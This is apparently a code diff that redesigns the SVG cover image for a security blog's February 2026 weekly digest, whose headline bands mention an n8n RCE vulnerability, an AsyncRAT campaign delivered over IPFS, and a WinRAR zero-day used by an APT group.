-  <text x="222" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#f59e0b" text-anchor="middle">CVE PATCH</text>
-  <rect x="285" y="490" width="92" height="24" rx="4" fill="#0a1020" stroke="#3b82f6" stroke-width="1"/>
-  <text x="331" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#3b82f6" text-anchor="middle">AI AGENT</text>
-  <rect x="389" y="490" width="110" height="24" rx="4" fill="#071a10" stroke="#22c55e" stroke-width="1"/>
-  <text x="444" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22c55e" text-anchor="middle">DOCKER CTR</text>
-  <rect x="511" y="490" width="83" height="24" rx="4" fill="#071a20" stroke="#22d3ee" stroke-width="1"/>
-  <text x="552" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22d3ee" text-anchor="middle">SEC OPS</text>
-
-  <!-- Bottom bar -->
-  <circle cx="32" cy="545" r="4" fill="#ef4444" opacity="0.6"/>
-  <text x="46" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569">Security Weekly Digest | February 04, 2026</text>
-  <text x="1168" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569" text-anchor="end">tech.2twodragon.com</text>
+</g>
+<text x="1122" y="614" font-family="Inter, Helvetica, Arial, sans-serif" font-size="10" font-weight="700" fill="#F5F7FA" text-anchor="middle">scan / full post</text>
 </svg>

--- a/assets/images/2026-02-05-Tech_Security_Weekly_Digest_CVE_AI_Malware_Go.svg
+++ b/assets/images/2026-02-05-Tech_Security_Weekly_Digest_CVE_AI_Malware_Go.svg
@@ -1,134 +1,302 @@
-<svg xmlns="http://www.w3.org/2000/svg" width="1200" height="630" viewBox="0 0 1200 630">
-  <title>Security Weekly Digest - February 05, 2026</title>
-  <defs>
-    <linearGradient id="bg" x1="0%" y1="0%" x2="100%" y2="100%">
-      <stop offset="0%" stop-color="#0a0e1a"/>
-      <stop offset="60%" stop-color="#0f1628"/>
-      <stop offset="100%" stop-color="#141b2d"/>
-    </linearGradient>
-    <linearGradient id="hg" x1="0%" y1="0%" x2="100%" y2="0%">
-      <stop offset="0%" stop-color="#1e293b"/>
-      <stop offset="100%" stop-color="#0f172a"/>
-    </linearGradient>
-    <filter id="glow" x="-50%" y="-50%" width="200%" height="200%">
-      <feGaussianBlur stdDeviation="18"/>
-    </filter>
-    <marker id="ar" markerWidth="8" markerHeight="8" refX="4" refY="4" orient="auto">
-      <path d="M0,0 L8,4 L0,8 Z" fill="#ef4444" opacity="0.7"/>
-    </marker>
-  </defs>
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1200 630" width="1200" height="630" role="img" aria-label="Research-based weekly digest cover: n8n Critical RCE CVE-2026-25049, AsyncRAT IPFS malware campaign, Amaranth-Dragon WinRAR APT">
+<!-- profile: high-quality-cover (L22 Stacked Bands, research-based, batch1-locked) -->
+<title>Weekly digest 2026-02-05: n8n RCE CVE-2026-25049 (CVSS 9.4), AsyncRAT DEAD#VAX IPFS, Amaranth-Dragon APT WinRAR Go</title>
+<defs>
+  <linearGradient id="bgSpread" x1="0%" y1="0%" x2="100%" y2="100%">
+    <stop offset="0%" stop-color="#0A1226"/>
+    <stop offset="50%" stop-color="#0C1430"/>
+    <stop offset="100%" stop-color="#131038"/>
+  </linearGradient>
+  <linearGradient id="bandA" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#1E0A0A"/>
+    <stop offset="100%" stop-color="#2A1010"/>
+  </linearGradient>
+  <linearGradient id="bandB" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#1A0E2E"/>
+    <stop offset="100%" stop-color="#24122F"/>
+  </linearGradient>
+  <linearGradient id="bandC" x1="0%" y1="0%" x2="100%" y2="0%">
+    <stop offset="0%" stop-color="#0A1A10"/>
+    <stop offset="100%" stop-color="#0E2018"/>
+  </linearGradient>
+  <radialGradient id="cveGlow" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#EF4444" stop-opacity="0.6"/>
+    <stop offset="100%" stop-color="#EF4444" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="ipfsGlow" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#A855F7" stop-opacity="0.6"/>
+    <stop offset="100%" stop-color="#A855F7" stop-opacity="0"/>
+  </radialGradient>
+  <radialGradient id="aptGlow" cx="50%" cy="50%" r="50%">
+    <stop offset="0%" stop-color="#22C55E" stop-opacity="0.55"/>
+    <stop offset="100%" stop-color="#22C55E" stop-opacity="0"/>
+  </radialGradient>
+  <filter id="softShadow" x="-10%" y="-10%" width="130%" height="130%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="2.5"/>
+    <feOffset dx="1" dy="3"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.55"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <filter id="textShadow" x="-5%" y="-5%" width="110%" height="110%">
+    <feGaussianBlur in="SourceAlpha" stdDeviation="1.2"/>
+    <feOffset dx="0" dy="1.5"/>
+    <feComponentTransfer><feFuncA type="linear" slope="0.85"/></feComponentTransfer>
+    <feMerge><feMergeNode/><feMergeNode in="SourceGraphic"/></feMerge>
+  </filter>
+  <pattern id="gridA" x="0" y="0" width="40" height="20" patternUnits="userSpaceOnUse">
+    <path d="M0 20 L40 20" stroke="#3A1A1A" stroke-width="0.4" opacity="0.6"/>
+    <path d="M40 0 L40 20" stroke="#3A1A1A" stroke-width="0.4" opacity="0.6"/>
+  </pattern>
+  <pattern id="dotB" x="0" y="0" width="18" height="18" patternUnits="userSpaceOnUse">
+    <circle cx="9" cy="9" r="0.8" fill="#3A2A4E" opacity="0.55"/>
+  </pattern>
+  <pattern id="dotC" x="0" y="0" width="16" height="16" patternUnits="userSpaceOnUse">
+    <circle cx="8" cy="8" r="0.7" fill="#1A2E1A" opacity="0.6"/>
+  </pattern>
+</defs>
 
-  <rect width="1200" height="630" fill="url(#bg)"/>
+<rect width="1200" height="630" fill="url(#bgSpread)"/>
 
-  <!-- Grid -->
-  <g opacity="0.04" stroke="#94a3b8" stroke-width="0.5">
-    <line x1="0" y1="105" x2="1200" y2="105"/><line x1="0" y1="210" x2="1200" y2="210"/>
-    <line x1="0" y1="315" x2="1200" y2="315"/><line x1="0" y1="420" x2="1200" y2="420"/>
-    <line x1="0" y1="525" x2="1200" y2="525"/>
-    <line x1="240" y1="0" x2="240" y2="630"/><line x1="480" y1="0" x2="480" y2="630"/>
-    <line x1="720" y1="0" x2="720" y2="630"/><line x1="960" y1="0" x2="960" y2="630"/>
+<!-- ═══ BAND A: n8n RCE CVE-2026-25049 (y 0-210) ═══ -->
+<g>
+  <rect x="0" y="0" width="1200" height="210" fill="url(#bandA)"/>
+  <rect x="0" y="0" width="1200" height="210" fill="url(#gridA)" opacity="0.55"/>
+  <rect x="0" y="0" width="8" height="210" fill="#EF4444"/>
+
+  <g filter="url(#textShadow)">
+    <text x="30" y="44" font-family="Inter, Helvetica, Arial, sans-serif" font-size="18" font-weight="700" letter-spacing="2.4" fill="#EF4444">CRITICAL RCE</text>
+    <text x="30" y="86" font-family="Inter, Helvetica, Arial, sans-serif" font-size="36" font-weight="800" fill="#F5F7FA">n8n Workflow : CVE-2026-25049</text>
+    <text x="30" y="118" font-family="Inter, Helvetica, Arial, sans-serif" font-size="20" font-weight="600" fill="#FCA5A5">CVSS 9.4 : input validation bypass</text>
+    <text x="30" y="146" font-family="Inter, Helvetica, Arial, sans-serif" font-size="15" font-weight="500" fill="#BFC9D9">Bypasses CVE-2025-68613 patch : arbitrary system command execution</text>
+    <text x="30" y="172" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="500" fill="#7A8899">2026.02.05</text>
   </g>
 
-  <!-- Glow orbs -->
-  <circle cx="200" cy="300" r="200" fill="#ef4444" opacity="0.06" filter="url(#glow)"/>
-  <circle cx="600" cy="350" r="180" fill="#f59e0b" opacity="0.05" filter="url(#glow)"/>
-  <circle cx="1000" cy="300" r="180" fill="#3b82f6" opacity="0.06" filter="url(#glow)"/>
+  <!-- RCE workflow nodes -->
+  <g transform="translate(550,95)">
+    <g filter="url(#softShadow)">
+      <!-- node 1: trigger -->
+      <rect x="-180" y="-38" width="82" height="38" rx="6" fill="#1A0A0A" stroke="#EF4444" stroke-width="1.8"/>
+      <text x="-139" y="-16" text-anchor="middle" font-family="Inter, monospace" font-size="11" font-weight="700" fill="#FCA5A5">TRIGGER</text>
+      <text x="-139" y="-2" text-anchor="middle" font-family="Inter, monospace" font-size="9" fill="#888">HTTP Hook</text>
 
-  <!-- Header -->
-  <rect x="0" y="0" width="1200" height="80" fill="url(#hg)" opacity="0.9"/>
-  <rect x="0" y="78" width="1200" height="2" fill="#334155" opacity="0.8"/>
-  <g transform="translate(48,40)">
-    <path d="M0,-22 L18,-12 L18,3 C18,13 10,20 0,24 C-10,20 -18,13 -18,3 L-18,-12 Z" fill="#1e3a5f" stroke="#3b82f6" stroke-width="1.5"/>
-    <path d="M-7,1 L-2,6 L8,-5" stroke="#3b82f6" stroke-width="2.5" fill="none" stroke-linecap="round"/>
-  </g>
-  <text x="80" y="44" font-family="Arial,sans-serif" font-size="28" font-weight="700" fill="#f1f5f9">Security Weekly Digest</text>
-  <rect x="990" y="18" width="178" height="44" rx="6" fill="#1e293b" stroke="#334155" stroke-width="1"/>
-  <text x="1079" y="48" font-family="Arial,sans-serif" font-size="15" font-weight="700" fill="#94a3b8" text-anchor="middle">February 05, 2026</text>
+      <!-- arrow 1 -->
+      <line x1="-97" y1="-19" x2="-78" y2="-19" stroke="#EF4444" stroke-width="1.5"/>
+      <polygon points="-78,-23 -72,-19 -78,-15" fill="#EF4444"/>
 
-  <!-- Card 1: WEB SRV -->
-  <rect x="32" y="100" width="220" height="120" rx="8" fill="#1a0505" stroke="#ef4444" stroke-width="1.5"/>
-  <circle cx="52" cy="120" r="6" fill="#ef4444"/>
-  <g transform="translate(142,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#ef4444" stroke-width="1.8"/>
-  </g>
-  <text x="142" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#ef4444" text-anchor="middle">WEB SRV</text>
-  <!-- Card 2: SEC OPS -->
-  <rect x="268" y="100" width="220" height="120" rx="8" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1.5"/>
-  <circle cx="288" cy="120" r="6" fill="#f59e0b"/>
-  <g transform="translate(378,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#f59e0b" stroke-width="1.8"/>
-  </g>
-  <text x="378" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#f59e0b" text-anchor="middle">SEC OPS</text>
-  <!-- Card 3: CLOUD SEC -->
-  <rect x="504" y="100" width="220" height="120" rx="8" fill="#0a1020" stroke="#3b82f6" stroke-width="1.5"/>
-  <circle cx="524" cy="120" r="6" fill="#3b82f6"/>
-  <g transform="translate(614,148)">
-    <path d="M-16,8 C-24,8 -26,-2 -20,-8 C-18,-18 -6,-22 4,-18 C8,-26 20,-26 24,-16 C30,-16 32,-8 28,0 C26,8 16,8 8,8 Z" fill="none" stroke="#3b82f6" stroke-width="1.8" transform="scale(0.65)"/>
-  </g>
-  <text x="614" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#3b82f6" text-anchor="middle">CLOUD SEC</text>
-  <!-- Card 4: THREAT INT -->
-  <rect x="740" y="100" width="200" height="120" rx="8" fill="#071a10" stroke="#22c55e" stroke-width="1.5"/>
-  <circle cx="760" cy="120" r="6" fill="#22c55e"/>
-  <g transform="translate(840,148)">
-    <path d="M0,-16 L14,-8 L14,4 C14,12 8,16 0,20 C-8,16 -14,12 -14,4 L-14,-8 Z" fill="none" stroke="#22c55e" stroke-width="1.8"/>
-  </g>
-  <text x="840" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22c55e" text-anchor="middle">THREAT INT</text>
-  <!-- Card 5: AI AGENT -->
-  <rect x="956" y="100" width="212" height="120" rx="8" fill="#071a20" stroke="#22d3ee" stroke-width="1.5"/>
-  <circle cx="976" cy="120" r="6" fill="#22d3ee"/>
-  <g transform="translate(1062,148)">
-    <circle cx="-12" cy="-8" r="4" fill="none" stroke="#22d3ee" stroke-width="1.5"/><circle cx="12" cy="-8" r="4" fill="none" stroke="#22d3ee" stroke-width="1.5"/><circle cx="0" cy="8" r="5" fill="none" stroke="#22d3ee" stroke-width="1.8"/><line x1="-8" y1="-6" x2="-2" y2="6" stroke="#22d3ee" stroke-width="1.2" opacity="0.7"/><line x1="8" y1="-6" x2="2" y2="6" stroke="#22d3ee" stroke-width="1.2" opacity="0.7"/><line x1="-8" y1="-8" x2="8" y2="-8" stroke="#22d3ee" stroke-width="1.2" opacity="0.5"/>
-  </g>
-  <text x="1062" y="197" font-family="Arial,sans-serif" font-size="13" font-weight="700" fill="#22d3ee" text-anchor="middle">AI AGENT</text>
+      <!-- node 2: exec -->
+      <rect x="-72" y="-38" width="82" height="38" rx="6" fill="#2A0A0A" stroke="#EF4444" stroke-width="2.2"/>
+      <text x="-31" y="-16" text-anchor="middle" font-family="Inter, monospace" font-size="11" font-weight="700" fill="#EF4444">EXEC NODE</text>
+      <text x="-31" y="-2" text-anchor="middle" font-family="Inter, monospace" font-size="9" fill="#FCA5A5">cmd inject</text>
 
-  <!-- Threat map area -->
-  <rect x="32" y="240" width="1136" height="220" rx="10" fill="#0c1220" stroke="#1e293b" stroke-width="1"/>
+      <!-- arrow 2 -->
+      <line x1="11" y1="-19" x2="30" y2="-19" stroke="#EF4444" stroke-width="1.5"/>
+      <polygon points="30,-23 36,-19 30,-15" fill="#EF4444"/>
 
-  <!-- Ambient dots -->
-  <g opacity="0.25">
-    <circle cx="180" cy="330" r="2" fill="#94a3b8"/><circle cx="200" cy="340" r="2" fill="#94a3b8"/>
-    <circle cx="550" cy="310" r="2" fill="#94a3b8"/><circle cx="570" cy="325" r="2" fill="#94a3b8"/>
-    <circle cx="750" cy="320" r="2" fill="#94a3b8"/><circle cx="900" cy="330" r="2" fill="#94a3b8"/>
-    <circle cx="350" cy="350" r="2" fill="#94a3b8"/><circle cx="1000" cy="340" r="2" fill="#94a3b8"/>
+      <!-- node 3: shell -->
+      <rect x="36" y="-38" width="82" height="38" rx="6" fill="#0A1A0A" stroke="#22C55E" stroke-width="1.6"/>
+      <text x="77" y="-16" text-anchor="middle" font-family="Inter, monospace" font-size="11" font-weight="700" fill="#22C55E">SHELL</text>
+      <text x="77" y="-2" text-anchor="middle" font-family="Inter, monospace" font-size="9" fill="#86EFAC">RCE achieved</text>
+    </g>
+
+    <!-- animated flow dot along workflow -->
+    <circle r="4" fill="#EF4444" opacity="0.9">
+      <animateMotion path="M-180,-19 L120,-19" dur="2.4s" repeatCount="indefinite"/>
+      <animate attributeName="opacity" values="0;1;1;0" dur="2.4s" repeatCount="indefinite"/>
+    </circle>
+
+    <!-- CVSS badge -->
+    <g transform="translate(175,0)" filter="url(#softShadow)">
+      <circle cx="0" cy="-19" r="44" fill="url(#cveGlow)">
+        <animate attributeName="r" values="32;52;32" dur="2.8s" repeatCount="indefinite"/>
+        <animate attributeName="opacity" values="0.7;0.1;0.7" dur="2.8s" repeatCount="indefinite"/>
+      </circle>
+      <rect x="-32" y="-55" width="64" height="72" rx="10" fill="#1A0A0A" stroke="#EF4444" stroke-width="2.2"/>
+      <text x="0" y="-24" text-anchor="middle" font-family="Inter, monospace" font-size="11" font-weight="700" fill="#FCA5A5">CVSS</text>
+      <text x="0" y="12" text-anchor="middle" font-family="Inter, monospace" font-size="34" font-weight="900" fill="#EF4444">9.4</text>
+    </g>
   </g>
-  <!-- Node: WEB SRV -->
-  <circle cx="170" cy="340" r="22" fill="#1a0505" stroke="#ef4444" stroke-width="2"/>
-  <text x="170" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#ef4444" text-anchor="middle">WEB</text>
-  <!-- Node: SEC OPS -->
-  <circle cx="370" cy="350" r="20" fill="#1a0d0d" stroke="#f59e0b" stroke-width="2"/>
-  <text x="370" y="354" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#f59e0b" text-anchor="middle">SEC</text>
-  <!-- Node: CLOUD SEC -->
-  <circle cx="580" cy="330" r="22" fill="#0a1020" stroke="#3b82f6" stroke-width="2"/>
-  <text x="580" y="334" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#3b82f6" text-anchor="middle">CLOU</text>
-  <!-- Node: THREAT INT -->
-  <circle cx="780" cy="355" r="18" fill="#071a10" stroke="#22c55e" stroke-width="2"/>
-  <text x="780" y="359" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22c55e" text-anchor="middle">THRE</text>
-  <!-- Node: AI AGENT -->
-  <circle cx="980" cy="340" r="22" fill="#071a20" stroke="#22d3ee" stroke-width="2"/>
-  <text x="980" y="344" font-family="Arial,sans-serif" font-size="9" font-weight="700" fill="#22d3ee" text-anchor="middle">AI</text>
-  <line x1="192" y1="340" x2="350" y2="350" stroke="#ef4444" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="390" y1="350" x2="558" y2="330" stroke="#f59e0b" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="602" y1="330" x2="762" y2="355" stroke="#3b82f6" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
-  <line x1="798" y1="355" x2="958" y2="340" stroke="#22c55e" stroke-width="1.5" stroke-dasharray="10 6" opacity="0.6" marker-end="url(#ar)"/>
 
-  <!-- Footer -->
-  <rect x="0" y="472" width="1200" height="158" fill="#080c18" opacity="0.95"/>
-  <rect x="0" y="472" width="1200" height="2" fill="#1e293b"/>
+  <!-- KPI card A -->
+  <g transform="translate(990,105)" filter="url(#softShadow)">
+    <rect x="-80" y="-65" width="180" height="125" rx="14" fill="#0A0808" stroke="#EF4444" stroke-width="2.2"/>
+    <text x="10" y="-30" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="700" letter-spacing="2" fill="#EF4444">CVSS SCORE</text>
+    <text x="10" y="28" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="72" font-weight="900" fill="#F5F7FA">9.4</text>
+    <text x="10" y="52" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#FCA5A5">patch immediately</text>
+  </g>
 
-  <!-- Tags -->
-  <rect x="32" y="490" width="83" height="24" rx="4" fill="#1a0505" stroke="#ef4444" stroke-width="1"/>
-  <text x="73" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#ef4444" text-anchor="middle">WEB SRV</text>
-  <rect x="127" y="490" width="83" height="24" rx="4" fill="#1a0d0d" stroke="#f59e0b" stroke-width="1"/>
-  <text x="168" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#f59e0b" text-anchor="middle">SEC OPS</text>
-  <rect x="222" y="490" width="101" height="24" rx="4" fill="#0a1020" stroke="#3b82f6" stroke-width="1"/>
-  <text x="272" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#3b82f6" text-anchor="middle">CLOUD SEC</text>
-  <rect x="335" y="490" width="110" height="24" rx="4" fill="#071a10" stroke="#22c55e" stroke-width="1"/>
-  <text x="390" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22c55e" text-anchor="middle">THREAT INT</text>
-  <rect x="457" y="490" width="92" height="24" rx="4" fill="#071a20" stroke="#22d3ee" stroke-width="1"/>
-  <text x="503" y="506" font-family="Arial,sans-serif" font-size="10" font-weight="700" fill="#22d3ee" text-anchor="middle">AI AGENT</text>
+  <!-- band A accent: static dots -->
+  <g fill="#EF4444" opacity="0.5">
+    <circle cx="400" cy="178" r="1.5"/>
+    <circle cx="470" cy="178" r="1.5"/>
+    <circle cx="540" cy="178" r="1.5"/>
+  </g>
+</g>
 
-  <!-- Bottom bar -->
-  <circle cx="32" cy="545" r="4" fill="#ef4444" opacity="0.6"/>
-  <text x="46" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569">Security Weekly Digest | February 05, 2026</text>
-  <text x="1168" y="550" font-family="Arial,sans-serif" font-size="12" fill="#475569" text-anchor="end">tech.2twodragon.com</text>
+<!-- ═══ BAND B: AsyncRAT DEAD#VAX via IPFS (y 210-420) ═══ -->
+<g>
+  <rect x="0" y="210" width="1200" height="210" fill="url(#bandB)"/>
+  <rect x="0" y="210" width="1200" height="210" fill="url(#dotB)" opacity="0.7"/>
+  <rect x="0" y="210" width="8" height="210" fill="#A855F7"/>
+
+  <g filter="url(#textShadow)">
+    <text x="30" y="254" font-family="Inter, Helvetica, Arial, sans-serif" font-size="18" font-weight="700" letter-spacing="2.4" fill="#C084FC">AI MALWARE CAMPAIGN</text>
+    <text x="30" y="296" font-family="Inter, Helvetica, Arial, sans-serif" font-size="36" font-weight="800" fill="#F5F7FA">DEAD#VAX : AsyncRAT via IPFS</text>
+    <text x="30" y="328" font-family="Inter, Helvetica, Arial, sans-serif" font-size="20" font-weight="600" fill="#D8B4FE">Phishing lure : IPFS gateway : RAT payload</text>
+    <text x="30" y="356" font-family="Inter, Helvetica, Arial, sans-serif" font-size="15" font-weight="500" fill="#BFC9D9">AI-assisted obfuscation : PowerShell dropper : registry persistence</text>
+  </g>
+
+  <!-- IPFS distribution hub -->
+  <g transform="translate(740,315)">
+    <circle cx="0" cy="0" r="80" fill="url(#ipfsGlow)">
+      <animate attributeName="r" values="60;90;60" dur="3.2s" repeatCount="indefinite"/>
+      <animate attributeName="opacity" values="0.5;0.1;0.5" dur="3.2s" repeatCount="indefinite"/>
+    </circle>
+    <circle cx="0" cy="0" r="34" fill="#2A1A4E" stroke="#A855F7" stroke-width="2.2" filter="url(#softShadow)"/>
+    <text x="0" y="-4" text-anchor="middle" font-family="Inter, monospace" font-size="12" font-weight="800" fill="#E9D5FF">IPFS</text>
+    <text x="0" y="12" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="700" fill="#C084FC">GATEWAY</text>
+
+    <!-- spokes -->
+    <g stroke="#A855F7" stroke-width="1.2" stroke-opacity="0.5" stroke-dasharray="3 4" fill="none">
+      <line x1="0" y1="0" x2="110" y2="-65"/>
+      <line x1="0" y1="0" x2="145" y2="10"/>
+      <line x1="0" y1="0" x2="110" y2="72"/>
+      <line x1="0" y1="0" x2="-110" y2="-65"/>
+      <line x1="0" y1="0" x2="-145" y2="10"/>
+      <line x1="0" y1="0" x2="-110" y2="72"/>
+      <line x1="0" y1="0" x2="20" y2="-95"/>
+      <line x1="0" y1="0" x2="-20" y2="-95"/>
+    </g>
+
+    <!-- victim endpoints: 4 animated, 4 static -->
+    <g>
+      <circle cx="110" cy="-65" r="6" fill="#7C3AED"><animate attributeName="opacity" values="0.3;1;0.3" dur="2.1s" repeatCount="indefinite"/></circle>
+      <circle cx="145" cy="10" r="6" fill="#7C3AED"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.9s" repeatCount="indefinite"/></circle>
+      <circle cx="110" cy="72" r="6" fill="#7C3AED" opacity="0.6"/>
+      <circle cx="-110" cy="-65" r="6" fill="#7C3AED" opacity="0.6"/>
+      <circle cx="-145" cy="10" r="6" fill="#7C3AED"><animate attributeName="opacity" values="0.3;1;0.3" dur="2.0s" repeatCount="indefinite"/></circle>
+      <circle cx="-110" cy="72" r="6" fill="#7C3AED" opacity="0.6"/>
+      <circle cx="20" cy="-95" r="6" fill="#EF4444"><animate attributeName="opacity" values="0.3;1;0.3" dur="1.8s" repeatCount="indefinite"/></circle>
+      <circle cx="-20" cy="-95" r="6" fill="#EF4444" opacity="0.6"/>
+    </g>
+
+    <!-- animated payload dots -->
+    <g fill="#E9D5FF">
+      <circle r="3"><animateMotion path="M0 0 L110 -65" dur="1.9s" repeatCount="indefinite"/></circle>
+      <circle r="3"><animateMotion path="M0 0 L145 10" dur="2.1s" repeatCount="indefinite"/></circle>
+      <circle r="3"><animateMotion path="M0 0 L110 72" dur="2.3s" repeatCount="indefinite"/></circle>
+      <circle r="3"><animateMotion path="M0 0 L-110 -65" dur="1.8s" repeatCount="indefinite"/></circle>
+      <circle r="3"><animateMotion path="M0 0 L-145 10" dur="2.0s" repeatCount="indefinite"/></circle>
+      <circle r="3"><animateMotion path="M0 0 L-110 72" dur="2.4s" repeatCount="indefinite"/></circle>
+    </g>
+  </g>
+
+  <!-- KPI card B -->
+  <g transform="translate(990,315)" filter="url(#softShadow)">
+    <rect x="-80" y="-65" width="180" height="125" rx="14" fill="#100820" stroke="#A855F7" stroke-width="2.2"/>
+    <text x="10" y="-30" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="13" font-weight="700" letter-spacing="2" fill="#C084FC">VECTOR</text>
+    <text x="10" y="18" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="40" font-weight="900" fill="#F5F7FA">IPFS</text>
+    <text x="10" y="52" text-anchor="middle" font-family="Inter, Helvetica, Arial, sans-serif" font-size="12" font-weight="600" fill="#D8B4FE">AI-obfuscated RAT</text>
+  </g>
+
+  <!-- band B accent: static dots -->
+  <g fill="#A855F7" opacity="0.5">
+    <circle cx="490" cy="265" r="1.2"/>
+    <circle cx="530" cy="270" r="1.2"/>
+    <circle cx="570" cy="265" r="1.2"/>
+  </g>
+</g>
+
+<!-- ═══ BAND C: Amaranth-Dragon APT WinRAR + Go (y 420-630) ═══ -->
+<g>
+  <rect x="0" y="420" width="1200" height="210" fill="url(#bandC)"/>
+  <rect x="0" y="420" width="1200" height="210" fill="url(#dotC)" opacity="0.6"/>
+  <rect x="0" y="420" width="8" height="210" fill="#22C55E"/>
+
+  <g filter="url(#textShadow)">
+    <text x="30" y="464" font-family="Inter, Helvetica, Arial, sans-serif" font-size="18" font-weight="700" letter-spacing="2.4" fill="#22C55E">CHINA-LINKED APT</text>
+    <text x="30" y="506" font-family="Inter, Helvetica, Arial, sans-serif" font-size="36" font-weight="800" fill="#F5F7FA">Amaranth-Dragon : WinRAR Zero-Day</text>
+    <text x="30" y="538" font-family="Inter, Helvetica, Arial, sans-serif" font-size="20" font-weight="600" fill="#86EFAC">Go-based implant : espionage campaign</text>
+    <text x="30" y="566" font-family="Inter, Helvetica, Arial, sans-serif" font-size="15" font-weight="500" fill="#BFC9D9">Archive bypass : Go toolchain C2 : lateral movement</text>
+  </g>
+
+  <!-- Kill-chain illustration -->
+  <g transform="translate(530,525)">
+    <!-- phishing box -->
+    <g filter="url(#softShadow)">
+      <rect x="-80" y="-34" width="86" height="50" rx="6" fill="#0A1A0A" stroke="#22C55E" stroke-width="1.6"/>
+      <text x="-37" y="-10" text-anchor="middle" font-family="Inter, monospace" font-size="11" font-weight="800" fill="#22C55E">PHISH</text>
+      <text x="-37" y="6" text-anchor="middle" font-family="Inter, monospace" font-size="9" fill="#86EFAC">WinRAR</text>
+      <text x="-37" y="18" text-anchor="middle" font-family="Inter, monospace" font-size="9" fill="#86EFAC">lure</text>
+    </g>
+
+    <!-- arrow 1 -->
+    <line x1="6" y1="-9" x2="26" y2="-9" stroke="#22C55E" stroke-width="1.5" stroke-dasharray="3 2"/>
+    <polygon points="26,-13 32,-9 26,-5" fill="#22C55E"/>
+
+    <!-- exploit box -->
+    <g filter="url(#softShadow)">
+      <rect x="32" y="-34" width="86" height="50" rx="6" fill="#1A0A0A" stroke="#EF4444" stroke-width="2"/>
+      <text x="75" y="-10" text-anchor="middle" font-family="Inter, monospace" font-size="11" font-weight="800" fill="#FCA5A5">EXPLOIT</text>
+      <text x="75" y="6" text-anchor="middle" font-family="Inter, monospace" font-size="9" fill="#FCA5A5">0-day</text>
+      <text x="75" y="18" text-anchor="middle" font-family="Inter, monospace" font-size="9" fill="#FCA5A5">bypass</text>
+    </g>
+    <!-- arrow 2 -->
+    <line x1="118" y1="-9" x2="138" y2="-9" stroke="#22C55E" stroke-width="1.5" stroke-dasharray="3 2"/>
+    <polygon points="138,-13 144,-9 138,-5" fill="#22C55E"/>
+
+    <!-- Go implant box -->
+    <g filter="url(#softShadow)">
+      <rect x="144" y="-34" width="92" height="50" rx="6" fill="#0A1A0E" stroke="#22C55E" stroke-width="1.8"/>
+      <text x="190" y="-10" text-anchor="middle" font-family="Inter, monospace" font-size="10" font-weight="800" fill="#22C55E">Go IMPLANT</text>
+      <text x="190" y="6" text-anchor="middle" font-family="Inter, monospace" font-size="9" fill="#86EFAC">C2 beacon</text>
+      <text x="190" y="18" text-anchor="middle" font-family="Inter, monospace" font-size="9" fill="#86EFAC">lateral move</text>
+    </g>
+
+    <!-- animated kill-chain dot -->
+    <circle r="4" fill="#22C55E" opacity="0.9">
+      <animateMotion path="M-80,-9 L240,-9" dur="3.0s" repeatCount="indefinite"/>
+      <animate attributeName="opacity" values="0;1;1;0" dur="3.0s" repeatCount="indefinite"/>
+    </circle>
+  </g>
+
+  <!-- APT glow -->
+  <circle cx="740" cy="525" r="55" fill="url(#aptGlow)">
+    <animate attributeName="r" values="40;80;40" dur="3.8s" repeatCount="indefinite"/>
+    <animate attributeName="opacity" values="0.5;0;0.5" dur="3.8s" repeatCount="indefinite"/>
+  </circle>
+
+  <!-- KPI card C -->
+  <g transform="translate(990,525)" filter="url(#softShadow)">
+    <rect x="-80" y="-65" width="180" height="125" rx="14" fill="#041A08" stroke="#22C55E" stroke-width="2.2"/>
